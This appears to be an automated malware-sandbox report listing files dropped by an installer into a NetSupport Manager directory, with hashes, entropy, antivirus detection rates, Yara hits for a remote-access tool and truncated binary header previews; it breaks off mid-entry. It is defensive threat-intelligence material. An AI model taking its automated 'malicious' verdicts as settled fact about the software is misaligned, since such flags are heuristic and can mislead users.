                                                                                                                    SHA-512:0FE24A5C910CCA7FD1BDB7D5988FE8ABC210A859D42AA0234D969F0911207E50D48AF244B0A2E86E0A66A3FFE981E5F48E2DD72A8D62FD1B53FD4B9ED531658E
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.$._.w._.w._.w..2w._.w.'Nw._.w._.w._.w.9.v._.w.9.v._.w.9.v._.w.9.v._.w.9.v._.w.9.v._.w.9"w._.w.9.v._.wRich._.w........................PE..L......Z.........."!.....T..........@........p...............................0............@A...................................,.......................(?......`@...w..8............................-..@...................`...@....................text...2R.......T.................. ..`.data...T(...p.......X..............@....idata...............p..............@..@.didat..4...........................@....rsrc...............................@..@.reloc..`@.......B..................@..B........................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcr100.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):773968
                                                                                                                    Entropy (8bit):6.901559811406837
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                    MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                    SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                    SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                    SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.inf

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Windows setup INFormation
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):328
                                                                                                                    Entropy (8bit):4.93007757242403
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                    MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                    SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                    SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                    SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                    Malicious:false
                                                                                                                    Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):33408
                                                                                                                    Entropy (8bit):6.382369861010622
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:mbjTW3njbfudD/lgV1co3+iMMGi/cKnLEJFs:uW3WD/lgv+F7KnN
                                                                                                                    MD5:1C2143ADEAB91D77EB5A9624BD28B283
                                                                                                                    SHA1:5F8BB1A5A6AE56AF8BBD60ACD1C4C67CFD8E26B1
                                                                                                                    SHA-256:F897746F7FC866B9FC100F36D6896B883E55B08C5AE9E7D8358FCDB937C6C097
                                                                                                                    SHA-512:0D9A5C2130496F4EF4B06AD55BE7BA84190A36E0D8412FA11E816EF53BBAE413CB11742C053644D6F4DF44D19746DB0EA420D0426B83EB1A298D42E9E48D11A2
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r2..6S.W6S.W6S.W...W5S.W..'W4S.W..&W4S.W...W4S.W6S.W$S.W@..W5S.W@..W7S.W...W;S.W...W4S.W@..W7S.W...W5S.W...W7S.W...W7S.WRich6S.W........PE..d...Q.(Y.........."......J...$.......(..........................................................................................................<...............(....d..........4....P...............................................P...............................text....=.......>.................. ..h.rdata..H....P.......B..............@..H.data........`.......J..............@....pdata..(............N..............@..HPAGE....9............R.............. ..`INIT.................X.............. ....rsrc................^..............@..B.reloc...............b..............@..B........................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sys

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):34008
                                                                                                                    Entropy (8bit):6.39207103344199
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:QbG73Znjbfudxpl7x1u33FrFteVVJKZg0ymNjB:B3ZWxpl7KFcKZgCH
                                                                                                                    MD5:FE21DE1984A1DB19D520F01BADAE7087
                                                                                                                    SHA1:13DEE984774E0E3605B8D9E34E73F79EFDAAB1E3
                                                                                                                    SHA-256:E7E628DE2ED025AD146328E86FA7AB83A79962972CC847263F984EDC567D6E7C
                                                                                                                    SHA-512:1C79A62CB6E695A5178D8C28CACC765977981A9FA0E005126D29CB82042F175569C88D51E3003148116F9CBAD68412DC597817B2C1C9688E1EA34ACF79E56AF5
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p2..4S.W4S.W4S.W...W7S.W..'W6S.W..&W6S.W...W6S.W4S.W%S.WB..W7S.WB..W5S.W...W9S.W...W6S.WB..W5S.W...W7S.W...W5S.W...W5S.WRich4S.W........PE..d.....cT.........."......H...$.......&..............................................."..........................................................<...............(....b..."......4....P...............................................P...............................text...];.......<.................. ..h.rdata..$....P.......@..............@..H.data........`.......H..............@....pdata..(............L..............@..HPAGE.................P.............. ..`INIT.................V.............. ....rsrc................\..............@..B.reloc...............`..............@..B........................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\nsm32.chm

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:MS Windows HtmlHelp Data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1205074
                                                                                                                    Entropy (8bit):7.972382983591089
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24576:JjcLsXXg/ijPaKIpt42tePKWs0u0jippHik509oh96IWIXqdgFbpcLnuTAOkvlI8:JjcLsXXg/ijPaKIpt42tePKWs0u0j8p0
                                                                                                                    MD5:6F293EC153DACA9796FD1E9C9C2B095E
                                                                                                                    SHA1:C9B280CDD81931D2CD95102FA04B96BA42F02E06
                                                                                                                    SHA-256:344DC9D97915EC8E4215A866F92E0BC4A50252B25534AD403105E00A750346FF
                                                                                                                    SHA-512:1BBCC4C4732ADEE87CA0092104741015D8AB8A9E5D21E6F805AE05BEC4A0F2889DBE12A9A28580EE5E1EE903F7FD42BC1CB750658F07D7408B60A19AA718439A
                                                                                                                    Malicious:false
                                                                                                                    Preview:ITSF....`.......3..........|.{.......".....|.{......."..`...............x.......T.......................Rc..............ITSP....T...........................................j..].!......."..T...............PMGLB................/..../#IDXHDR......../#ITBITS..../#IVB....:.../#STRINGS....O..6./#SYSTEM....D./#TOPICS.......p./#URLSTR....#..,./#URLTBL...... ./#WINDOWS....n.L./$FIftiMain....o..$./$OBJINST....T.../$WWAssociativeLinks/..../$WWAssociativeLinks/BTree......L./$WWAssociativeLinks/Data....T.V./$WWAssociativeLinks/Map....*.../$WWAssociativeLinks/Property....4 ./$WWKeywordLinks/..../$WWKeywordLinks/BTree....V..L./$WWKeywordLinks/Data...".L./$WWKeywordLinks/Map...n.z./$WWKeywordLinks/Property...h $/2fa-(two-factor-authentication.html...G.=./abort.html.....e./add_a_gateway_-_username.html...i.y)/adding_a_new_to_the_database_client.html...b.c(/adding_deleting_clients_in_a_group.html...E.s./additem.html...8.y-/adjusting_microphone_and_speaker_volume.html...1.1#/advanced_client_configura

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmexec.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):57824
                                                                                                                    Entropy (8bit):6.862108284538071
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:lF4WcduX42gXhBksgUHVEDqAnIocwl1kkr2pe/NPHDHf/ckXr2pe/eJHDHf/cky:lF4DduX4lBnzyiwYkee/VjHPee/MjHu
                                                                                                                    MD5:59C2F14F34522E03B127851AD682FE5A
                                                                                                                    SHA1:AA6204D13BEC0D33D7B3BE1043222D3367AB110F
                                                                                                                    SHA-256:01DF4E94F6C64CE675F3E809889E3F4FA2182B9D5411A9584F239577C3FE8F20
                                                                                                                    SHA-512:98949C4C649F45DD3BDDED2DCFE19D2DB45F33CE2B9E0170A8A23C74B8D5746FF17EDD33D372F491F58F13913CF9C67545144B4235C2EC168832D321EDD3AC38
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~..s:.. :.. :.. U.` 2.. U.T ... 3.m ?.. :.. ... U.U 0.. U.d ;.. U.c ;.. Rich:.. ........PE..L.....oe.................D...<...............`....@..................................]....@..................................y..<........................]...........................................x..@............`...............................text....B.......D.................. ..`.rdata..4....`... ...H..............@..@.data................h..............@....rsrc................t..............@..@.reloc..`............|..............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8177120
                                                                                                                    Entropy (8bit):5.048395174836045
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:98304:aU4gcDUXCYllmuLc3Klq/Uq+PujPh6415zi:argcQj9c31f+PujU415+
                                                                                                                    MD5:E85AF106BEDAF5E96E5633537ED29D8C
                                                                                                                    SHA1:CD4E38AC92374C94CCBDE982613439788EFCB7DA
                                                                                                                    SHA-256:3B8CCEB2A7049E2B1288E35C1469D8E2B510E844292B96F8C86108B53448C6A8
                                                                                                                    SHA-512:1763A02C49FF03EA3581795636DD73C5105659685112B57A1FC9D92E60A1B0748C584F1FD1F27CBBC126ED2A72CE9C2C5332EF430604C33D6DF3099BAEA6D82E
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!Kk.e*..e*..e*...\..m*...\..R*..lR..f*..e*..X*...\..n*...\..d*...\..d*..Riche*..........PE..L......e...........!.....F....|.....b........`................................|.....G.}...@..................................z..(.......T.{..........h|..]...p|......................................w..@............`...............................text....D.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....rsrc...T.{.......{..v..............@..@.reloc..p)...p|..*...>|.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):96736
                                                                                                                    Entropy (8bit):6.808355354530158
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:zMc3pwImQbF54NpbfukIEpOBfh76ORM7Cx1Iiee/bjHxR9ee/rjHJ:zMc3ppv4rbfu1cEV6ORM7CteqjteOjp
                                                                                                                    MD5:3C616AB2D7A5AC710E57CABCEB819CFA
                                                                                                                    SHA1:F447BFDB8D2C1220E73BA4E55E6752F224CFCC09
                                                                                                                    SHA-256:D39A4722318A7AA4782CB6837BE8989C24224B47A58AD8C639CF4C12FC97915A
                                                                                                                    SHA-512:B4E7C99CB41E4D7FE16B93192596E849B0E9F4749F4D1C0E7C552CE61B231BFBBD3A0B8DD8030938A069485035D0392339BEA157657BE6FCFF09B09021DBF9A5
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................z......~......x......L......M.....u......`....H......|......{....Rich...................PE..L...9.oe.....................^....................@..........................`............@.................................,........0..(................]...@..h...@...................................@............................................text............................... ..`.rdata...<.......>..................@..@.data...............................@....rsrc...(....0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.cat

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):9221
                                                                                                                    Entropy (8bit):7.232259392017478
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:K/GHRiwQnYe+PjP1rhr7+vgwKjtlAur9ZCspE+TMAr4zTh:WnYPL/rPUHeMtzN
                                                                                                                    MD5:E30476931A500CBB1316218170DB3FDD
                                                                                                                    SHA1:40E8A0BEB0E6C9B5C1037D01E921418B47828C90
                                                                                                                    SHA-256:3DE96F95811CF5FAF09A1909CADD7637B9B19E07FCB320AAD6EB4A187F67FE47
                                                                                                                    SHA-512:7E2132B5CCE530D74F2694D491733AD1B5E43E37112EB5D7587862955C7C83EAA46C128D35BDA35F382D0455F809CDA23CCBCDC6F6618DAFB9FB3DF191EBEE65
                                                                                                                    Malicious:false
                                                                                                                    Preview:0.$...*.H........#.0.#....1.0...+......0.....+.....7......0...0...+.....7.....M....><F._.G......140522094031Z0...+.....7.....0...0..}.R2.D.0.B.F.D.6.D.A.3.A.1.4.A.A.7.E.2.B.7.B.9.B.F.0.5.5.1.A.4.9.D.7.6.6.5.C.E.3.0...1..%08..+.....7...1*0(...F.i.l.e........n.s.p.s.c.r...i.n.f...0>..+.....7...100....O.S.A.t.t.r........2.:.5...1.,.2.:.5...2...0E..+.....7...17050...+.....7.......0!0...+........-..m..J....Q..ve.00b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RD.E.5.2.B.3.3.8.1.4.E.C.2.4.6.D.9.C.5.2.1.C.4.1.1.6.9.4.7.5.A.C.9.B.5.3.4.F.8.C...1..-08..+.....7...1*0(...F.i.l.e........n.s.p.s.c.r...s.y.s...0>..+.....7...100....O.S.A.t.t.r........2.:.5...1.,.2.:.5...2...0M..+.....7...1?0=0...+.....7...0...........0!0...+.........R.8..$m.R.A..u..SO.0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RF.C.E.2.2.B.2.4.B.E.8.3.7.B.D.F.1.A.E.3.8.6.D.D.7.7.3.F.1.E.0.A.8.6.E.A.2.F.A.4...1..G0

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.inf

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Windows setup INFormation
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2930
                                                                                                                    Entropy (8bit):5.396768235621853
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:a0xFYjOMpjOOsLGjXivDAaUntuQwuHkvFuDf+nLE7ScxbnbCNTBfoNRS2KUKFN5K:aYmtjOOsGjXivDAaUntJ3Df+LeSUEeyW
                                                                                                                    MD5:78B6B809D8ABCCB9FA9BF540B7CCD363
                                                                                                                    SHA1:2D0BFD6DA3A14AA7E2B7B9BF0551A49D7665CE30
                                                                                                                    SHA-256:ACFB0123F62A8A4740361F77B9D34AA6481B2AA30153F56ED866F84507D69E0C
                                                                                                                    SHA-512:E16A728840724FD3B8E6DF3A1B0F476D66F54F0D1A795AAB2928ECD739E1B8D6B716882D5E4F5FBCD8BB2ED7EB6B7B279198938AC7E70D130D6A0B9404FD6200
                                                                                                                    Malicious:false
                                                                                                                    Preview:; NSPSCR.INF..; Copyright (c) 2008-2014 Net Support Limited....[Version]..DriverVer=05/22/2014,12.01..CatalogFile=nspscr.cat..Signature="$Windows NT$"..Class=SmartCardReader..ClassGuid={50DD5230-BA8A-11D1-BF5D-0000F805F530}..;Class = LegacyDriver..;ClassGuid = {8ecc055d-047f-11d1-a537-0000f8753ed1}..Provider=%MFG%....[ControlFlags]..; Prevent legacy install for PnP readers..ExcludeFromSelect=Root\NS-PseudoSmartCardReader....[Manufacturer]..%MFG%=NSL, NTAMD64....; ============ Add reg for all readers ===============....[Reader.Install.AddReg]..HKLM, Software\Microsoft\Cryptography\Calais\Readers,,,..HKLM, System\CurrentControlSet\Services\SCardSvr,Start,0x00010001,2..HKLM, System\CurrentControlSet\Services\CertPropSvc,Start,0x00010001,2....; ================= NSL readers =====================....[NSL.NTAMD64]..; DisplayName Section DeviceId..; ----------- ------- --------..%MFG.DeviceDesc% = PSCR.Install, Root\NS-PseudoSmartCardReader....[PSCR.Inst

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):27272
                                                                                                                    Entropy (8bit):6.237518432862503
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:aI2iS+JdAYLZCgM11FZgx4rbnjfpe0mSoXot5RJVO8WCT74Td2aQnYPL/rKeMPPW:a9BqdtbOjpe3TXobRJVki7cTQS
                                                                                                                    MD5:F56457F0C75E3D9B82C88B425CB5C95B
                                                                                                                    SHA1:4F6BE0D0CCDAAEEC42F5F45071C6063E00AE3EE4
                                                                                                                    SHA-256:6DA36B43A75611476B0ABBD4F2E81FC455B694306C9500F54DD2524985FF0E1A
                                                                                                                    SHA-512:635B72AF34E1E6B63C7CE659DF2B9A73EB537AB9127A3ABF920188C5F3CDF571DB3942282CED0BBAD8DB28D6DDA73C6623280250B886D2DA4D43A86884DB9F41
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{/o.?N.F?N.F?N.F...F=N.F..zF=N.F?N.F N.FI.zF8N.FI.|F=N.F..lF<N.F..|F>N.FI.lF>N.F..sF7N.F..}F>N.F..yF>N.FRich?N.F........................PE..d.....}S.........."......<... ......................................................p..........................................................d............p..4....P...............@...............................................@...............................text....$.......&.................. ..h.rdata.......@.......*..............@..H.data...,....P......................@....pdata..4....p.......0..............@..HPAGEABLE.............4.............. ..`INIT....~............D.............. ....rsrc................J..............@..B.reloc..0............N..............@..B........................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\nssres.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):16632288
                                                                                                                    Entropy (8bit):4.729694563429236
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:98304:Ig23l4a23kKnTtFXg+/nkeA3jiDz6Ic6MWlNkJ1uxsh7ncWHrwGra:Ck3RnTnXgcGjiilQ3mn5n1rwf
                                                                                                                    MD5:AC850065D5807949D987F1E00F34DFF3
                                                                                                                    SHA1:4E3C564046BD4F655A958F299D6DB9198FB99FF8
                                                                                                                    SHA-256:D0BE908B5B2149896D5F6E28C2E3D0735ABC7B200EB88C7ECFA1974618417B77
                                                                                                                    SHA-512:630EEA09F442EA382AC142A2BE6CE3D82E25ED88CA87873B9D6E0E4D5902C7D134486A1ECAD50089C74FFECD1E5696F080345C3EFBCEFF9C818CF653FE0ABDD5
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!Kk.e*..e*..e*...\..m*...\..R*..lR..f*..e*..X*...\..n*...\..d*...\..d*..Riche*..........PE..L....HXf...........!.....F..."......b........`......................................U.....@..................................z..(....................l...]...p.......................................w..@............`...............................text....D.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....rsrc................v..............@..@.reloc..p)...p...*...B..............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):49632
                                                                                                                    Entropy (8bit):7.033464466519071
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:3hGznfNnu0sbqmuebcTYCBU1wn+Pam8Arr2pe/PZDRHDHf/ckWOir2pe/ssHDHfm:3hGzfFDmmTYCtMawee/njHVyee/zjHe
                                                                                                                    MD5:97AF6CC2109C3195ECF019C4E988079D
                                                                                                                    SHA1:2B1A0ED3FA7C15D77A8C08FCA4CBB503CBBFAB0F
                                                                                                                    SHA-256:F02F921D5C52EF1D56585AC571A42502B62F571D02E80B88C99BF74C8F390733
                                                                                                                    SHA-512:085D7D1F65EAF18064FEE84AD4FB1F173922F1E8C60E058274CB70D28D242A9E25415C7E204313517425A736B7A534C7D6592B8B1F1F5B312E4CCFD0471465D1
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~....Z...Z...Z...Z...Z...Z...Z...Z...Z...Z..Z...Z...Z...Z...Z...Z...Z...Z...Z...Z...Z...Z...ZRich...Z................PE..L...E.oe...........!.....6...........@.......P............................................@..........................c.......[..d.......x............d...]..........pQ...............................Z..@............P..X............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data....r...p.......P..............@....rsrc...x............R..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):120288
                                                                                                                    Entropy (8bit):5.251370253406986
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:o+N4gcCvlwwYBg6vJcaW3eSu+ee/WjHwlee/UjH3:z4ZEROJcaieSreHj4eljX
                                                                                                                    MD5:B8ACD5C9E200166C6B4E5001AEEEAF20
                                                                                                                    SHA1:3C37EE9757CF6AB21F4876529436E15D14DA700B
                                                                                                                    SHA-256:FFBD328E86899F332ED8CB4A31B93814D363034793D875B871D44EBD0C5414BC
                                                                                                                    SHA-512:96982BFDD8334684F832DC3F5B36288F63E5F210F4AAF14B7A630A367E5BEF8FFAB13BC1C7193BE5E2D210179598ABC654DAE5A412F844856B292A2A3199EF05
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O...............V"......X-..............X.......X+......X,.....Rich....................PE..L...W.oe.....................r...... ........ ....@..................................r....@.................................L ..P....0..dm...........x...]......$...0 ............................................... ..(............................text............................... ..`.rdata....... ......................@..@.rsrc...dm...0...n..................@..@.reloc...............v..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):77280
                                                                                                                    Entropy (8bit):6.755047083861626
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:lPSdA+F6mXkAShLY9w5VnC6ee/GjHAfee/EOjH3:ladbQUShLY9w5VnC6enj2ekjX
                                                                                                                    MD5:92E0CD73327A7C8B0FDAD0B26F883895
                                                                                                                    SHA1:9C053C38BA7AC4720EBD55C1FD1F651508170230
                                                                                                                    SHA-256:E1E8946A82898C48E8D61AC398D3C548CC462A555EE41C67BDDC79FFBD131741
                                                                                                                    SHA-512:1F1161C6FF81046B468CEB3417AF88859F6D7E39D3CAA3BED692578084929037E478A84F9C9E409BC24B4919B6309A6B2FC82B7865E2CA1C5234970E317A92F4
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c....W...W...W..W...W..W...W..W...W...W..W..W...W..W...W..W...WRich...W................PE..L...W.oe.................t...X...... .............@.......................................@.....................................<........................]..........p...................................@...............@............................text...Es.......t.................. ..`.rdata.../.......0...x..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):24470496
                                                                                                                    Entropy (8bit):5.634476864287587
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:196608:QWrPg1mPv8hXPx8Fv3Cwa/cs/Rp0se9YMg212:Q2Hv8hfeFvy3h/Rpve2rZ
                                                                                                                    MD5:9741168634198501D2907B3C10683D4E
                                                                                                                    SHA1:59153955D1DDB7EFD4B6BD9A0D24AD67938B5A14
                                                                                                                    SHA-256:D04A3992534AF3D8826D1F579FEDCE7477929EAC01E883063EACAA424D3F5218
